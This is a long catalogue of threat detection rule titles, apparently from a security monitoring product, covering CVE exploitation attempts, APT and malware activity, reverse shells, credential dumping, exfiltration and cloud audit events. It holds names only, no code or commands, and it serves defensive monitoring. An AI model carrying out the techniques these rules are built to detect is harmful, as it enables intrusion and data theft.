  • Exploitation Attempt Of CVE-2020-1472 - Execution of ZeroLogon PoC
  • Suspicious PrinterPorts Creation (CVE-2020-1048)
  • Exploited CVE-2020-10189 Zoho ManageEngine
  • CVE-2020-1048 Exploitation Attempt - Suspicious New Printer Ports - Registry
  • TerraMaster TOS CVE-2020-28188
  • Blue Mockingbird
  • GALLIUM IOCs
  • Trickbot Malware Activity
  • Potential Ke3chang/TidePool Malware Activity
  • Cisco ASA FTD Exploit CVE-2020-3452
  • Oracle WebLogic Exploit CVE-2020-14882
  • GALLIUM Artefacts - Builtin
  • UNC2452 Process Creation Patterns
  • Suspicious VBScript UN2452 Pattern
  • TAIDOOR RAT DLL Load
  • Possible Exploitation of Exchange RCE CVE-2021-42321
  • Possible CVE-2021-1675 Print Spooler Exploitation
  • CVE-2021-21972 VSphere Exploitation
  • CVE-2021-21978 Exploitation Attempt
  • VMware vCenter Server File Upload CVE-2021-22005
  • Pulse Connect Secure RCE Attack CVE-2021-22893
  • Potential Atlassian Confluence CVE-2021-26084 Exploitation Attempt
  • Potential CVE-2021-26084 Exploitation Attempt
  • Exploitation of CVE-2021-26814 in Wazuh
  • Potential CVE-2021-26857 Exploitation Attempt
  • CVE-2021-26858 Exchange Exploitation
  • Suspicious Word Cab File Write CVE-2021-40444
  • Potential CVE-2021-40444 Exploitation Attempt
  • Potential Exploitation Attempt From Office Application
  • ADSelfService Exploitation
  • LPE InstallerFileTakeOver PoC CVE-2021-41379
  • CVE-2021-41773 Exploitation Attempt
  • Sitecore Pre-Auth RCE CVE-2021-42237
  • Suspicious Computer Account Name Change CVE-2021-42287
  • CVE-2021-44077 POC Default Dropped File
  • Potential CVE-2021-44228 Exploitation Attempt - VMware Horizon
  • Log4j RCE CVE-2021-44228 Generic
  • Log4j RCE CVE-2021-44228 in Fields
  • Exchange ProxyShell Pattern
  • Suspicious RazerInstaller Explorer Subprocess
  • SonicWall SSL/VPN Jarrewrite Exploitation
  • Potential BlackByte Ransomware Activity
  • Conti Volume Shadow Listing
  • Conti NTDS Exfiltration Command
  • Potential Conti Ransomware Database Dumping Activity Via SQLCmd
  • Potential Devil Bait Related Indicator
  • Potential Devil Bait Malware Reconnaissance
  • Devil Bait Potential C2 Communication Traffic
  • Goofy Guineapig Backdoor IOC
  • Potential Goofy Guineapig Backdoor Activity
  • Potential Goofy Guineapig GoolgeUpdate Process Anomaly
  • Goofy Guineapig Backdoor Potential C2 Communication
  • Pingback Backdoor File Indicators
  • Pingback Backdoor DLL Loading Activity
  • Pingback Backdoor Activity
  • Small Sieve Malware File Indicator Creation
  • Small Sieve Malware CommandLine Indicator
  • Small Sieve Malware Registry Persistence
  • Exchange Exploitation Used by HAFNIUM
  • APT PRIVATELOG Image Load Pattern
  • SOURGUM Actor Behaviours
  • DEWMODE Webshell Access
  • Potential CVE-2023-21554 QueueJumper Exploitation
  • Potential CVE-2022-21587 Exploitation Attempt
  • CVE-2022-24527 Microsoft Connected Cache LPE
  • Potential CVE-2022-26809 Exploitation Attempt
  • Potential CVE-2022-29072 Exploitation Attempt
  • CVE-2022-31656 VMware Workspace ONE Access Auth Bypass
  • Apache Spark Shell Command Injection - Weblogs
  • Atlassian Bitbucket Command Injection Via Archive API
  • Potential OWASSRF Exploitation Attempt - Proxy
  • Potential OWASSRF Exploitation Attempt - Webserver
  • Suspicious Sysmon as Execution Parent
  • Exploitation Indicator Of CVE-2022-42475
  • Potential Centos Web Panel Exploitation Attempt - CVE-2022-44877
  • Potential CVE-2022-46169 Exploitation Attempt
  • MSSQL Extended Stored Procedure Backdoor Maggie
  • BlueSky Ransomware Artefacts
  • Potential Bumblebee Remote Thread Creation
  • ChromeLoader Malware Execution
  • Emotet Loader Execution Via .LNK File
  • Hermetic Wiper TG Process Patterns
  • Raspberry Robin Subsequent Execution of Commands
  • Raspberry Robin Initial Execution From External Drive
  • Serpent Backdoor Payload Execution Via Scheduled Task
  • Potential Raspberry Robin Dot Ending File
  • Potential ACTINIUM Persistence Activity
  • FakeUpdates/SocGholish Activity
  • MERCURY APT Activity
  • MSMQ Corrupted Packet Encountered
  • Exploitation Indicators Of CVE-2023-20198
  • CVE-2023-22518 Exploitation Attempt - Suspicious Confluence Child Process (Linux)
  • Potential CVE-2023-23752 Exploitation Attempt
  • Potential CVE-2023-25157 Exploitation Attempt
  • Potential CVE-2023-25717 Exploitation Attempt
  • Potential CVE-2023-27363 Exploitation - HTA File Creation By FoxitPDFReader
  • Potential MOVEit Transfer CVE-2023-34362 Exploitation - File Activity
  • MOVEit CVE-2023-34362 Exploitation Attempt - Potential Web Shell Request
  • Potential CVE-2023-36874 Exploitation - Fake Wermgr.Exe Creation
  • Potential CVE-2023-36874 Exploitation - Fake Wermgr Execution
  • Potential CVE-2303-36884 URL Request Pattern Traffic
  • Potential CVE-2023-36884 Exploitation - URL Marker
  • Potential CVE-2023-36884 Exploitation - Share Access
  • CVE-2023-38331 Exploitation Attempt - Suspicious Double Extension File
  • CVE-2023-38331 Exploitation Attempt - Suspicious WinRAR Child Process
  • Potential Information Disclosure CVE-2023-43261 Exploitation - Proxy
  • Potential Information Disclosure CVE-2023-43261 Exploitation - Web
  • Exploitation Attempt Of CVE-2023-46214 Using Public POC Code
  • CVE-2023-46747 Exploitation Activity - Proxy
  • CVE-2023-46747 Exploitation Activity - Webserver
  • CVE-2023-4966 Exploitation Attempt - Citrix ADC Sensitive Information Disclosure - Proxy
  • CVE-2023-4966 Exploitation Attempt - Citrix ADC Sensitive Information Disclosure - Webserver
  • Potential Exploitation Attempt Of Undocumented WindowsServer RCE
  • Potential SocGholish Second Stage C2 DNS Query
  • Potential COLDSTEEL RAT File Indicators
  • Potential COLDSTEEL Persistence Service DLL Creation
  • Potential COLDSTEEL Persistence Service DLL Load
  • COLDSTEEL RAT Anonymous User Process Execution
  • Potential COLDSTEEL RAT Windows User Creation
  • COLDSTEEL Persistence Service Creation
  • DarkGate - Autoit3.EXE Execution Parameters
  • DarkGate - User Created Via Net.EXE
  • Injected Browser Process Spawning Rundll32 - GuLoader Activity
  • IcedID Malware Suspicious Single Digit DLL Execution Via Rundll32
  • Potential Pikabot C2 Activity
  • Potential Pikabot Discovery Activity
  • Potential Pikabot Hollowing Activity
  • Pikabot Fake DLL Extension Execution Via Rundll32.EXE
  • Qakbot Regsvr32 Calc Pattern
  • Potential Qakbot Rundll32 Execution
  • Qakbot Uninstaller Execution
  • SNAKE Malware WerFault Persistence File Creation
  • Potential SNAKE Malware Installation CLI Arguments Indicator
  • Potential SNAKE Malware Installation Binary Indicator
  • Potential SNAKE Malware Persistence Service Execution
  • SNAKE Malware Covert Store Registry Key
  • Ursnif Redirection Of Discovery Commands
  • Potential Compromised 3CXDesktopApp Beaconing Activity - DNS
  • Potential Compromised 3CXDesktopApp Beaconing Activity - Netcon
  • Potential Compromised 3CXDesktopApp Execution
  • Potential Suspicious Child Process Of 3CXDesktopApp
  • Potential Compromised 3CXDesktopApp Update Activity
  • Potential Compromised 3CXDesktopApp Beaconing Activity - Proxy
  • Potential Compromised 3CXDesktopApp ICO C2 File Download
  • Scheduled Tasks Names Used By SVR For GraphicalProton Backdoor
  • Scheduled Tasks Names Used By SVR For GraphicalProton Backdoor - Task Scheduler
  • Diamond Sleet APT DNS Communication Indicators
  • Diamond Sleet APT File Creation Indicators
  • Diamond Sleet APT DLL Sideloading Indicators
  • Diamond Sleet APT Process Activity Indicators
  • Diamond Sleet APT Scheduled Task Creation - Registry
  • Potential Operation Triangulation C2 Beaconing Activity - DNS
  • Potential Operation Triangulation C2 Beaconing Activity - Proxy
  • Potential APT FIN7 Related PowerShell Script Created
  • Potential APT FIN7 POWERHOLD Execution
  • Potential POWERTRASH Script Execution
  • Potential APT FIN7 Reconnaissance/POWERTRASH Related Activity
  • Lace Tempest File Indicators
  • Lace Tempest PowerShell Evidence Eraser
  • Lace Tempest PowerShell Launcher
  • Lace Tempest Cobalt Strike Download
  • Lace Tempest Malware Loader Execution
  • Lazarus APT DLL Sideloading Activity
  • Mint Sandstorm - Log4J Wstomcat Process Execution
  • Potential APT Mustang Panda Activity Against Australian Gov
  • Onyx Sleet APT File Creation Indicators
  • PaperCut MF/NG Exploitation Related Indicators
  • PaperCut MF/NG Potential Exploitation
  • Peach Sandstorm APT Process Activity Indicators
  • UNC4841 - Email Exfiltration File Pattern
  • UNC4841 - Barracuda ESG Exploitation Indicators
  • UNC4841 - SSL Certificate Exfiltration Via Openssl
  • UNC4841 - Download Compressed Files From Temp.sh Using Wget
  • UNC4841 - Download Tar File From Untrusted Direct IP Via Wget
  • CVE-2024-1212 Exploitation - Progress Kemp LoadMaster Unauthenticated Command Injection
  • Potential Exploitation of CVE-2024-3094 - Suspicious SSH Child Process
  • Potential CVE-2024-3400 Exploitation - Palo Alto GlobalProtect OS Command Injection
  • Potential Exploitation of CVE-2024-37085 - Suspicious Creation Of ESX Admins Group
  • Potential Exploitation of CVE-2024-37085 - Suspicious ESX Admins Group Activity
  • CVE-2024-49113 Exploitation Attempt - LDAP Nightmare
  • CVE-2024-50623 Exploitation Attempt - Cleo
  • Potential CSharp Streamer RAT Loading .NET Executable Image
  • File Creation Related To RAT Clients
  • Potential KamiKakaBot Activity - Winlogon Shell Persistence
  • Potential Kapeka Decrypted Backdoor Indicator
  • Kapeka Backdoor Loaded Via Rundll32.EXE
  • Kapeka Backdoor Persistence Activity
  • Kapeka Backdoor Execution Via RunDLL32.EXE
  • Kapeka Backdoor Autorun Persistence
  • Kapeka Backdoor Scheduled Task Creation
  • Lummac Stealer Activity - Execution Of More.com And Vbc.exe
  • Potential Raspberry Robin Aclui Dll SideLoading
  • Potential Raspberry Robin CPL Execution Activity
  • DPRK Threat Actor - C2 Communication DNS Indicators
  • Forest Blizzard APT - File Creation Activity
  • Forest Blizzard APT - Process Creation Activity
  • Forest Blizzard APT - Custom Protocol Handler Creation
  • Forest Blizzard APT - Custom Protocol Handler DLL Registry Set
  • ScreenConnect - SlashAndGrab Exploitation Indicators
  • Privilege Role Elevation Not Occuring on SAW or PAW
  • Privilege Role Sign-In Outside Expected Controls
  • Privilege Role Sign-In Outside Of Normal Hours
  • Potential Zerologon (CVE-2020-1472) Exploitation
  • New RDP Connection Initiated From Domain Controller
  • Dfsvc.EXE Initiated Network Connection Over Uncommon Port
  • Sign-in Failure Bad Password Threshold
  • CVE-2021-3156 Exploitation Attempt
  • CVE-2021-3156 Exploitation Attempt Bruteforcing
  • Potential CVE-2021-4034 Exploitation Attempt
  • OMIGOD SCX RunAsProvider ExecuteScript
  • Possible DNS Tunneling
  • High DNS subdomain requests rate per domain
  • Large domain name request
  • Invoke-Obfuscation CLIP+ Launcher
  • Invoke-Obfuscation Obfuscated IEX Invocation
  • Invoke-Obfuscation STDIN+ Launcher
  • Invoke-Obfuscation VAR+ Launcher
  • Invoke-Obfuscation Via Stdin
  • Invoke-Obfuscation Via Use Clip
  • Invoke-Obfuscation Via Use MSHTA
  • Invoke-Obfuscation Via Use Rundll32
  • Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION
  • File Creation by Office Applications
  • Execution via CL_Invocation.ps1 (2 Lines)
  • Execution via CL_Mutexverifiers.ps1 (2 Lines)
  • Silence.Downloader V3
  • DNSCat2 Powershell Implementation Detection Via Process Creation
  • MSI Spawned Cmd and Powershell Spawned Processes
  • Always Install Elevated Parent Child Correlated
  • Stored Credentials in Fake Files
  • Windows Kernel and 3rd-Party Drivers Exploits Token Stealing
  • Metasploit Or Impacket Service Installation Via SMB PsExec
  • Detection of Possible Rotten Potato
medium 1496
Show Rules (1496)
  • App Permissions Granted For Other APIs
  • Edit of .bash_profile and .bashrc
  • User Added To Admin Group - MacOS
  • Brute Force
  • Suspicious Remote Thread Target
  • Suspicious Unattend.xml File Access
  • SCM DLL Sideload
  • Suspicious Non-Browser Network Communication With Reddit API
  • PsExec Pipes Artifacts
  • Netcat The Powershell Version - PowerShell Module
  • Accessing Encrypted Credentials from Google Chrome Login Database
  • Suspicious PowerShell Download
  • SyncAppvPublishingServer Execution to Bypass Powershell Restriction
  • SyncAppvPublishingServer Execution to Bypass Powershell Restriction
  • Potential NT API Stub Patching
  • Read and Execute a File Via Cmd.exe
  • Cmd Stream Redirection
  • Visual Basic Script Execution
  • Indirect Command Exectuion via Forfiles
  • Invoke-Obfuscation RUNDLL LAUNCHER
  • Monitoring Wuauclt.exe For Lolbas Execution Of DLL
  • Abusing Findstr for Defense Evasion
  • Nslookup PwSh Download Cradle
  • Application Whitelisting Bypass via DLL Loaded by odbcconf.exe
  • Potential PowerShell Base64 Encoded Shellcode
  • Potential Xor Encoded PowerShell Command
  • Renamed PaExec Execution
  • Root Certificate Installed
  • Suspicious Rundll32 Script in CommandLine
  • Run from a Zip File
  • Suspicious Bitstransfer via PowerShell
  • Suspicious Cmd Execution via WMI
  • Wscript Execution from Non C Drive
  • Squirrel Lolbin
  • Winword.exe Loads Suspicious DLL
  • WMI Execution Via Office Process
  • WMI Remote Command Execution
  • WMI Reconnaissance List Remote Services
  • Sysinternals SDelete Registry Keys
  • Autorun Keys Modification
  • Service Binary in Uncommon Folder
  • Potential Persistence Via COM Search Order Hijacking
  • PowerShell Execution
  • Domain Trust Discovery
  • Security Event Log Cleared
  • Django Framework Exceptions
  • Kubernetes CronJob/Job Modification
  • Kubernetes Admission Controller Modification
  • Kubernetes Events Deleted
  • Potential Remote Command Execution In Pod Container
  • Creation Of Pod In System Namespace
  • Kubernetes Rolebinding Modification
  • Kubernetes Secrets Modified or Deleted
  • Potential Sidecar Injection Into Running Deployment
  • Python SQL Exceptions
  • Ruby on Rails Framework Exceptions
  • Spring Framework Exceptions
  • Suspicious SQL Query
  • AWS Attached Malicious Lambda Layer
  • AWS CloudTrail Important Change
  • New Network Route Added
  • Ingress/Egress Security Group Modification
  • LoadBalancer Security Group Modification
  • RDS Database Security Group Modification
  • AWS Console GetSigninToken Potential Abuse
  • SES Identity Has Been Deleted
  • AWS SAML Provider Deletion Activity
  • AWS S3 Bucket Versioning Disable
  • AWS Key Pair Import Activity
  • AWS EC2 Disable EBS Encryption
  • AWS ECS Task Definition That Queries The Credential Endpoint
  • AWS EFS Fileshare Modified or Deleted
  • AWS EFS Fileshare Mount Modified or Deleted
  • AWS IAM Backdoor Users Keys
  • New AWS Lambda Function URL Configuration Created
  • AWS RDS Master Password Change
  • AWS Root Credentials
  • AWS Snapshot Backup Exfiltration
  • AWS Suspicious SAML Activity
  • Azure Active Directory Hybrid Health AD FS New Server
  • Azure Active Directory Hybrid Health AD FS Service Delete
  • User Added to an Administrator's Azure AD Role
  • Azure Application Deleted
  • Azure Application Gateway Modified or Deleted
  • Azure Application Security Group Modified or Deleted
  • Azure Application Credential Modified
  • Number Of Resource Creation Or Deployment Activities
  • Azure Device No Longer Managed or Compliant
  • Azure Device or Configuration Modified or Deleted
  • Azure DNS Zone Modified or Deleted
  • Azure Firewall Modified or Deleted
  • Azure Firewall Rule Collection Modified or Deleted
  • Granting Of Permissions To An Account
  • Azure Keyvault Key Modified or Deleted
  • Azure Key Vault Modified or Deleted
  • Azure Keyvault Secrets Modified or Deleted
  • Azure Kubernetes Admission Controller
  • Azure Kubernetes CronJob
  • Azure Kubernetes Events Deleted
  • Azure Kubernetes Network Policy Change
  • Azure Kubernetes Pods Deleted
  • Azure Kubernetes RoleBinding/ClusterRoleBinding Modified and Deleted
  • Azure Kubernetes Sensitive Role Access
  • Azure Kubernetes Secret or Config Object Access
  • Azure Kubernetes Service Account Modified or Deleted
  • Disabled MFA to Bypass Authentication Mechanisms
  • Azure Network Firewall Policy Modified or Deleted
  • Azure Point-to-site VPN Modified or Deleted
  • Azure Firewall Rule Configuration Modified or Deleted
  • Azure Network Security Configuration Modified or Deleted
  • Azure Virtual Network Device Modified or Deleted
  • Azure New CloudShell Created
  • Azure Owner Removed From Application or Service Principal
  • Rare Subscription-level Operations In Azure
  • Azure Service Principal Created
  • Azure Service Principal Removed
  • Azure Suppression Rule Created
  • Azure Virtual Network Modified or Deleted
  • Azure VPN Connection Modified or Deleted
  • CA Policy Removed by Non Approved Actor
  • CA Policy Updated by Non Approved Actor
  • New CA Policy by Non-approved Actor
  • Bitlocker Key Retrieval
  • Certificate-Based Authentication Enabled
  • Guest Users Invited To Tenant By Non Approved Inviters
  • New Root Certificate Authority Added
  • End User Consent Blocked
  • Added Owner To Application
  • App Assigned To Azure RBAC/Microsoft Entra Role
  • Change to Authentication Method
  • Azure Domain Federation Settings Modified
  • User Added To Group With CA Policy Modification Access
  • User Removed From Group With CA Policy Modification Access
  • Guest User Invited By Non Approved Inviters
  • User State Changed From Guest To Member
  • Privileged Account Creation
  • Multi Factor Authentication Disabled For User Account
  • Password Reset By User Account
  • Account Lockout
  • Successful Authentications From Countries You Do Not Operate Out Of
  • Increased Failed Authentications Of Any Type
  • Authentications To Important Apps Using Single Factor Authentication
  • Device Registration or Join Without MFA
  • Application Using Device Code Authentication Flow
  • Applications That Are Using ROPC Authentication Flow
  • Account Disabled or Blocked for Sign in Attempts
  • Login to Disabled Account
  • Multifactor Authentication Denied
  • Azure Unusual Authentication Interruption
  • Multifactor Authentication Interrupted
  • Users Authenticating To Other Azure AD Tenants
  • User Access Blocked by Azure Conditional Access
  • Bitbucket Global Permission Changed
  • Bitbucket Global Secret Scanning Rule Deleted
  • Bitbucket Global SSH Settings Changed
  • Bitbucket Audit Log Configuration Updated
  • Bitbucket User Details Export Attempt Detected
  • Bitbucket User Login Failure
  • Bitbucket User Login Failure Via SSH
  • Bitbucket User Permissions Export Attempt
  • Cisco Duo Successful MFA Authentication Via Bypass Code
  • GCP Access Policy Deleted
  • GCP Break-glass Container Workload Deployed
  • Google Cloud Storage Buckets Modified or Deleted
  • Google Cloud Re-identifies Sensitive Information
  • Google Cloud DNS Zone Modified or Deleted
  • Google Cloud Firewall Modified or Deleted
  • Google Full Network Traffic Packet Capture
  • Google Cloud Kubernetes Admission Controller
  • Google Cloud Kubernetes CronJob
  • Google Cloud Kubernetes RoleBinding
  • Google Cloud Kubernetes Secrets Modified or Deleted
  • Google Cloud Service Account Disabled or Deleted
  • Google Cloud Service Account Modified
  • Google Cloud SQL Database Modified or Deleted
  • Google Cloud VPN Tunnel Modified or Deleted
  • Google Workspace Application Access Level Modified
  • Google Workspace Application Removed
  • Google Workspace Granted Domain API Access
  • Google Workspace MFA Disabled
  • Google Workspace Role Modified or Deleted
  • Google Workspace Role Privilege Deleted
  • Google Workspace User Granted Admin Privileges
  • Github Delete Action Invoked
  • Github Fork Private Repositories Setting Enabled/Cleared
  • Github Outside Collaborator Detected
  • Github Repository/Organization Transferred
  • Github SSH Certificate Configuration Changed
  • New Federated Domain Added
  • New Federated Domain Added - Exchange
  • Activity from Suspicious IP Addresses
  • Activity Performed by Terminated User
  • Activity from Anonymous IP Addresses
  • Data Exfiltration to Unsanctioned Apps
  • Activity from Infrequent Country
  • Microsoft 365 - Impossible Travel Activity
  • Logon from a Risky IP Address
  • Microsoft 365 - Potential Ransomware Activity
  • PST Export Alert Using eDiscovery Alert
  • PST Export Alert Using New-ComplianceSearchAction
  • Suspicious OAuth App File Download Activities
  • Microsoft 365 - Unusual Volume of File Deletion
  • Microsoft 365 - User Restricted from Sending Email
  • Okta Admin Functions Access Through Proxy
  • Okta Admin Role Assigned to an User or Group
  • Okta Admin Role Assignment Created
  • Okta API Token Created
  • Okta API Token Revoked
  • Okta Application Modified or Deleted
  • Okta Application Sign-On Policy Modified or Deleted
  • Okta Identity Provider Created
  • Okta Network Zone Deactivated or Deleted
  • Okta MFA Reset or Deactivated
  • Okta Policy Rule Modified or Deleted
  • Okta Security Threat Detected
  • Okta Unauthorized Access to App
  • Okta User Account Locked Out
  • Default Credentials Usage
  • Bpfdoor TCP Ports Redirect
  • File Time Attribute Change - Linux
  • Remove Immutable File Attribute - Auditd
  • Creation Of An User Account
  • Data Exfiltration with Wget
  • Masquerading as Linux Crond Process
  • Modify System Firewall
  • Suspicious C2 Activities
  • Suspicious Commands Linux
  • Program Executions in Suspicious Folders
  • Suspicious History File Operations - Linux
  • Systemd Service Creation
  • Unix Shell Configuration Modification
  • Suspicious Log Entries
  • Suspicious Use of /dev/tcp
  • Modifying Crontab
  • SSHD Error Message CVE-2018-15473
  • Suspicious OpenSSH Daemon Error
  • Disabling Security Tools - Builtin
  • Persistence Via Sudoers Files
  • Suspicious VSFTPD Error Messages
  • Persistence Via Cron Files
  • Wget Creating Files in Tmp Directory
  • Linux Doas Conf File Creation
  • Shell Invocation via Apt - Linux
  • Linux Base64 Encoded Pipe to Shell
  • BPFtrace Unsafe Option Usage
  • Enable BPF Kprobes Tracing
  • Remove Immutable File Attribute
  • Linux Base64 Encoded Shebang In CLI
  • Clear Linux Logs
  • Cat Sudoers
  • Remove Scheduled Cron Task/Job
  • Potential Linux Process Code Injection Via DD Utility
  • Ufw Force Stop Using Ufw-Init
  • ESXi Network Configuration Discovery Via ESXCLI
  • ESXi Storage Information Discovery Via ESXCLI
  • ESXi Syslog Configuration Change Via ESXCLI
  • ESXi System Information Discovery Via ESXCLI
  • ESXi Account Creation Via ESXCLI
  • ESXi VM List Discovery Via ESXCLI
  • ESXi VM Kill Via ESXCLI
  • ESXi VSAN Information Discovery Via ESXCLI
  • Group Has Been Deleted Via Groupdel
  • Suspicious Package Installed - Linux
  • Flush Iptables Ufw Chain
  • Potentially Suspicious Named Pipe Created Via Mkfifo
  • Mount Execution With Hidepid Parameter
  • Nohup Execution
  • Pnscan Binary Data Transmission Activity
  • Python Spawning Pretty TTY Via PTY Module
  • Potential Ruby Reverse Shell
  • Scheduled Cron Task/Job - Linux
  • Disabling Security Tools
  • Disable Or Stop Services
  • Potential Linux Amazon SSM Agent Hijacking
  • Chmod Suspicious Directory
  • Suspicious Curl File Upload - Linux
  • Suspicious Curl Change User Agents - Linux
  • Potential Discovery Activity Using Find - Linux
  • Suspicious Git Clone - Linux
  • Print History File Contents
  • Interactive Bash Suspicious Children
  • Linux Shell Pipe to Shell
  • Potential Suspicious Change To Sensitive/Critical Files
  • Execution Of Script Located In Potentially Suspicious Directory
  • Touch Suspicious Service File
  • User Has Been Deleted Via Userdel
  • User Added To Root/Sudoers Group Using Usermod
  • Download File To Potentially Suspicious Directory Via Wget
  • Potential Xterm Reverse Shell
  • MacOS Emond Launch Daemon
  • MacOS Scripting Interpreter AppleScript
  • File Time Attribute Change
  • Hidden Flag Set On File/Directory Via Chflags - MacOS
  • Indicator Removal on Host - Clear Mac System Logs
  • Hidden User Creation
  • Credentials from Password Stores - Keychain
  • System Integrity Protection (SIP) Disabled
  • Disable Security Tools
  • User Added To Admin Group Via Dscl
  • User Added To Admin Group Via DseditGroup
  • Root Account Enable Via Dsenableroot
  • Disk Image Creation Via Hdiutil - MacOS
  • Disk Image Mounting Via Hdiutil - MacOS
  • Suspicious Installer Package Child Process
  • System Information Discovery Using Ioreg
  • JAMF MDM Potential Suspicious Child Process
  • Launch Agent/Daemon Execution Via Launchctl
  • File Download Via Nscurl - MacOS
  • Payload Decoded and Decrypted via Built-in Utilities
  • Scheduled Cron Task/Job - MacOs
  • Security Software Discovery - MacOs
  • Osacompile Execution By Potentially Suspicious Applet/Osascript
  • Suspicious Browser Child Process - MacOS
  • Suspicious Execution via macOS Script Editor
  • Potential Discovery Activity Using Find - MacOS
  • Suspicious History File Operations
  • Potential In-Memory Download And Compile Of Payloads
  • Suspicious MacOS Firmware Activity
  • System Information Discovery Using sw_vers
  • User Added To Admin Group Via Sysadminctl
  • System Information Discovery Via Sysctl - MacOS
  • System Information Discovery Using System_Profiler
  • Time Machine Backup Deletion Attempt Via Tmutil - MacOS
  • Time Machine Backup Disabled Via Tmutil - MacOS
  • New File Exclusion Added To Time Machine Via Tmutil - MacOS
  • Potential XCSSET Malware Infection
  • Cisco Denial of Service
  • Cisco File Deletion
  • Cisco Show Commands Input
  • Cisco Modify Configuration
  • Cisco Sniffing
  • Suspicious DNS Query with B64 Encoded String
  • Telegram Bot API Request
  • MITRE BZAR Indicators for Execution
  • MITRE BZAR Indicators for Persistence
  • Potential PetitPotam Attack Via EFS RPC Calls
  • Possible PrintNightmare Print Driver Install
  • SMB Spoolss Name Piped Usage
  • Suspicious DNS Z Flag Bit Set
  • DNS TOR Proxies
  • Executable from Webdav
  • Remote Task Creation via ATSVC Named Pipe - Zeek
  • Suspicious Access to Sensitive File Extensions - Zeek
  • Transferring Files with Credential Data via Network Shares - Zeek
  • Kerberos Network Traffic RC4 Ticket Encryption
  • Apache Threading Error
  • Download from Suspicious Dyndns Hosts
  • F5 BIG-IP iControl Rest API Command Execution - Proxy
  • PUA - Advanced IP/Port Scanner Update Check
  • Telegram API Access
  • Suspicious Base64 Encoded User-Agent
  • HTTP Request With Empty User Agent
  • Windows PowerShell User Agent
  • Rclone Activity via Proxy
  • Potential Base64 Encoded User-Agent
  • F5 BIG-IP iControl Rest API Command Execution - Webserver
  • Successful IIS Shortname Fuzzing Scan
  • Path Traversal Exploitation Attempts
  • Source Code Enumeration Detection by Keyword
  • Suspicious User-Agents Related To Recon Tools
  • Ntdsutil Abuse
  • Dump Ntds.dit To Suspicious Location
  • Backup Catalog Deleted
  • MSI Installation From Suspicious Locations
  • MSI Installation From Web
  • MSSQL Server Failed Logon From External Network
  • File Was Not Allowed To Run
  • Deployment AppX Package Was Blocked By AppLocker
  • Potential Malicious AppX Package Installation Attempts
  • Deployment Of The AppX Package Was Blocked By The Policy
  • Suspicious AppX Package Installation Attempt
  • Uncommon AppX Package Locations
  • Suspicious Digital Signature Of AppX Package
  • BITS Transfer Job Downloading File Potential Suspicious Extension
  • BITS Transfer Job With Uncommon Or Suspicious Remote TLD
  • Certificate Private Key Acquired
  • Certificate Exported From Local Certificate Store
  • DNS Query To MEGA Hosting Website - DNS Client
  • DNS Query To Put.io - DNS Client
  • Failed DNS Zone Transfer
  • Uncommon New Firewall Rule Added In Windows Firewall Exception List
  • New Firewall Rule Added In Windows Firewall Exception List Via WmiPrvSE.EXE
  • A Rule Has Been Deleted From The Windows Firewall Exception List
  • ETW Logging/Processing Option Disabled On IIS Server
  • New Module Module Added To IIS Server
  • Potential Active Directory Reconnaissance/Enumeration Via LDAP
  • Standard User In High Privileged Group
  • MSExchange Transport Agent Installation - Builtin
  • NTLM Brute Force
  • Potential Remote Desktop Connection to Non-Domain Host
  • OpenSSH Server Listening On Socket
  • Azure AD Health Monitoring Agent Registry Keys Access
  • Azure AD Health Service Agents Registry Keys Access
  • Potential AD User Enumeration From Non-Machine Account
  • Remote Task Creation via ATSVC Named Pipe
  • Processes Accessing the Microphone and Webcam
  • DCERPC SMB Spoolss Named Pipe
  • Device Installation Blocked
  • DPAPI Domain Master Key Backup Attempt
  • Invoke-Obfuscation COMPRESS OBFUSCATION - Security
  • Invoke-Obfuscation RUNDLL LAUNCHER - Security
  • ISO Image Mounted
  • Kerberoasting Activity - Initial Query
  • LSASS Access From Non System Account
  • Windows Network Access Suspicious desktop.ini Action
  • New or Renamed User Account with '$' Character
  • Denied Access To Remote Desktop
  • Password Policy Enumerated
  • Windows Pcap Drivers
  • Possible DC Shadow Attack
  • SCM Database Handle Failure
  • SCM Database Privileged Operation
  • Potential Secure Deletion with SDelete
  • Remote Access Tool Services Have Been Installed - Security
  • A New Trust Was Created To A Domain
  • Addition of SID History to Active Directory Object
  • Account Tampering - Suspicious Failed Logon Reasons
  • Group Policy Abuse for Privilege Addition
  • Startup/Logon Script Added to Group Policy Object
  • Suspicious Remote Logon with Explicit Credentials
  • Potentially Suspicious AccessMask Requested From LSASS
  • Password Protected ZIP File Opened
  • Uncommon Outbound Kerberos Connection - Security
  • Suspicious Access to Sensitive File Extensions
  • Suspicious Kerberos RC4 Ticket Encryption
  • Remote Service Activity via SVCCTL Named Pipe
  • Transferring Files with Credential Data via Network Shares
  • User Added to Local Administrator Group
  • Potential Privileged System Service Operation - SeLoadDriverPrivilege
  • Windows Defender Exclusion List Modified
  • Windows Defender Exclusion Deleted
  • WMI Persistence - Security
  • Windows Defender Exclusion Registry Key - Write Access Requested
  • Potential Access Token Abuse
  • External Remote RDP Logon from Public IP
  • Pass the Hash Activity 2
  • Failed Logon From Public IP
  • Suspicious Application Installed
  • Suspicious Rejected SMB Guest Logon From IP
  • NTLMv1 Logon Between Client and Server
  • Potential CVE-2021-42287 Exploitation Attempt
  • Eventlog Cleared
  • Certificate Use With No Strong Mapping
  • Windows Defender Threat Detection Service Disabled
  • Invoke-Obfuscation COMPRESS OBFUSCATION - System
  • Invoke-Obfuscation RUNDLL LAUNCHER - System
  • Anydesk Remote Access Software Service Installation
  • CSExec Service Installation
  • Mesh Agent Service Installation
  • NetSupport Manager Service Install
  • PAExec Service Installation
  • New PDQDeploy Service - Server Side
  • New PDQDeploy Service - Client Side
  • RemCom Service Installation
  • Remote Access Tool Services Have Been Installed - System
  • Remote Utilities Host Service Install
  • PsExec Service Installation
  • Tap Driver Installation
  • TacticalRMM Service Installation
  • Uncommon Service Installation Image Path
  • Service Installation in Suspicious Folder
  • Potential RDP Exploit CVE-2019-0708
  • Scheduled Task Executed From A Suspicious Location
  • Scheduled Task Executed Uncommon LOLBIN
  • Windows Defender Exclusions Added
  • Windows Defender Real-Time Protection Failure/Restart
  • WMI Persistence
  • Remote Thread Creation Via PowerShell In Uncommon Target
  • Remote Thread Created In Shell Application
  • Remote Thread Creation By Uncommon Source Image
  • Remote Thread Creation In Uncommon Target Image
  • Creation Of a Suspicious ADS File Outside a Browser Download
  • Hidden Executable In NTFS Alternate Data Stream
  • Unusual File Download From File Sharing Websites - File Stream
  • AppX Package Installation Attempts Via AppInstaller.EXE
  • Cloudflared Tunnels Related DNS Requests
  • DNS Query To Devtunnels Domain
